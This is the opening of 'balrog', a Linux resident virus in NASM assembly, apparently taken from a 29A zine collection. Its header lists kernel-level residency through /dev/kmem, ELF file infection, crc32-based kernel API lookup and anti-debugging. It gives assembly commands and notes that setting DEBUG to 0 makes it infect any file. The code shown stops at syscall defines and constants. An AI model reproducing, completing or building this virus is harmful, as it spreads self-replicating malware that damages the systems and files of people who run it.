29a-7.010

从29A上收集的病毒源码

;                                                       _
;                                                              _( (~\
;       _ _                        /    hAckniX               ( \> > \
;   -/~/ / ~\                     :;   PienSteVo    \       _  > /(~\/
;  || | | /\ ;\                   |l      _____     |;     ( \/    > >
;  _\\)\)\)/ ;;;                  `8o __-~     ~\   d|      \      //
; ///(())(__/~;;\                  "88p;.  -. _\_;.oP        (_._/ /
;(((__   __ \\   \                  `>,% (\  (\./)8"         ;:'  i
;)))--`.'-- (( ;,8 \               ,;%%%:  ./V^^^V'          ;.   ;.
;((\   |   /)) .,88  `: ..,,;;;;,-::::::'_::\   ||\         ;[8:   ;
; )|  ~-~  |(|(888; ..``'::::8888oooooo.  :\`^^^/,,~--._    |88::  |
; |\ -===- /|  \8;; ``:.      oo.8888888888:`((( o.ooo8888Oo;:;:'  |
; |_~-___-~_|   `-\.   `        `o`88888888b` )) 888b88888P""'     ;
; ; ~~~~;~~         "`--_`.       b`888888888;(.,"888b888"  ..::;-'
;   ;      ;              ~"-....  b`8888888:::::.`8888. .:;;;''
;      ;    ;                 `:::. `:::OOO:::::::.`OO' ;;;''
; :       ;                     `.      "``::::::''    .'
;    ;                           `.   \_              /
;  ;       ;                       +:   ~~--  `:'  -';
;                                   `:         : .::/
;      ;   How'd ya like that?      ;;+_  :::. :..;;;
;                                   ;;;;;;,;;;;;;;;,;
;
; this is the first version of balrog resident virus
; the resident mecanism is inspired from the (wonderful) stoag virus
; I played with kernel symbol only for demonstrating the use
; of exported kernel symbolz
;
; the total size of the virus is not optimized
; I prefer write a source wich is more readable
;
;	features of this virus is:
;		- resident in ring0 mode ( accessing by /dev/kmem )
;		- using exported kernel symboles
;		- retrieving kernel API with crc32
;		- elf infection without tempory file
;		- antidebugging ( detecting if task is traced )
;
; to Assemble it:
;	nasm -f elf balrog.asm
;	ld -o balrog balrog.o

bits 32
global _start

section .text

	%define SYS_exit 1
	%define SYS_read 3
	%define SYS_write 4
	%define SYS_open 5
	%define SYS_close 6
	%define SYS_execve 11
	%define SYS_seek 19
	%define SYS_ptrace 26
	%define SYS_brk 45
	%define SYS_sethostname 74
	%define SYS_munmap 91
	%define SYS_uname 109
	%define SYS_deprotect 125
	%define SYS_get_kernel_syms 130
	; if u want to infect any file, put DEBUG to 0
	; for demonstration only debug = 1
	; then files to infect are filtred by sz_filter
	%define DEBUG 1
	%define ___BREAK___ int 3
	;crc32 calculation
	%define CRC32_ 0C1A7F39Ah
	%define CRC32_init 09C3B248Eh

	%define OF ebp - delta		; offset in user space
	%define KOF ebp - delta_ring0	; offset in kernel space

;-